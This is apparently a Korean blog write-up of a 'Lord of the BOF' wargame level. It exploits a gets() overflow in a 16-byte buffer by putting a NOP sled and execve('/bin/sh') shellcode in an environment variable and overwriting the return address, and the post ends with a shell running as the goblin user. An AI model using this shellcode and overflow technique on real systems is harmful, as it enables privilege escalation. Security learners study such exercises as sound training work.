관리 메뉴

IT창고

[BOF] cobolt -> goblin 본문

WarGame/The Load of the BOF

[BOF] cobolt -> goblin

방구석여포 2018. 2. 10. 23:27

goblin 문제입니다.

[cobolt@localhost cobolt]$ cat goblin.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - goblin

        - small buffer + stdin

*/


int main()

{

    char buffer[16];

    gets(buffer);

    printf("%s\n", buffer);

}


cobolt문제에서 gets함수만 추가되었습니다.
환경변수를 이용해서 쉘코드를 올리고 cat명령어를 이용해서 오버플로우를 합니다.

[cobolt@localhost cobolt]$ export SH=$(python -c 'print "\x90"*10000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\xb0\x0b\x89\xe1\x31\xd2\xcd\x80"')


(gdb) set disassembly-flavor intel 
(gdb) disassemble main
Dump of assembler code for function main:
0x80483f8 <main>: push   %ebp
0x80483f9 <main+1>: mov    %ebp,%esp
0x80483fb <main+3>: sub    %esp,16
0x80483fe <main+6>: lea    %eax,[%ebp-16]
0x8048401 <main+9>: push   %eax
0x8048402 <main+10>: call   0x804830c <gets>
0x8048407 <main+15>: add    %esp,4
0x804840a <main+18>: lea    %eax,[%ebp-16]
0x804840d <main+21>: push   %eax
0x804840e <main+22>: push   0x8048470
0x8048413 <main+27>: call   0x804833c <printf>
0x8048418 <main+32>: add    %esp,8
0x804841b <main+35>: leave  
0x804841c <main+36>: ret    
0x804841d <main+37>: nop    
0x804841e <main+38>: nop    
0x804841f <main+39>: nop    
End of assembler dump.
(gdb) b *0x804841b
Breakpoint 1 at 0x804841b

ret함수 전에 브레이크를 걸었습니다.


[cobolt@localhost cobolt]$ $(python -c 'print "\x90"*20+"\x76\xdc\xff\xbf"' ; cat)|./goblin
߿¿
bash$ id
uid=502(cobolt) gid=502(cobolt) euid=503(goblin) egid=503(goblin) groups=502(cobolt)
bash$ my-pass
euid = 503
hackers proof
bash$ 


'WarGame > The Load of the BOF' 카테고리의 다른 글

[BOF] wolfman -> darkelf  (0) 2018.02.12
[BOF] orc -> wolfman  (0) 2018.02.12
[BOF] goblin -> orc  (0) 2018.02.11
[BOF] gremlin -> cobolt  (0) 2018.02.10
[BOF] gate-> gremlin  (0) 2018.02.09
Comments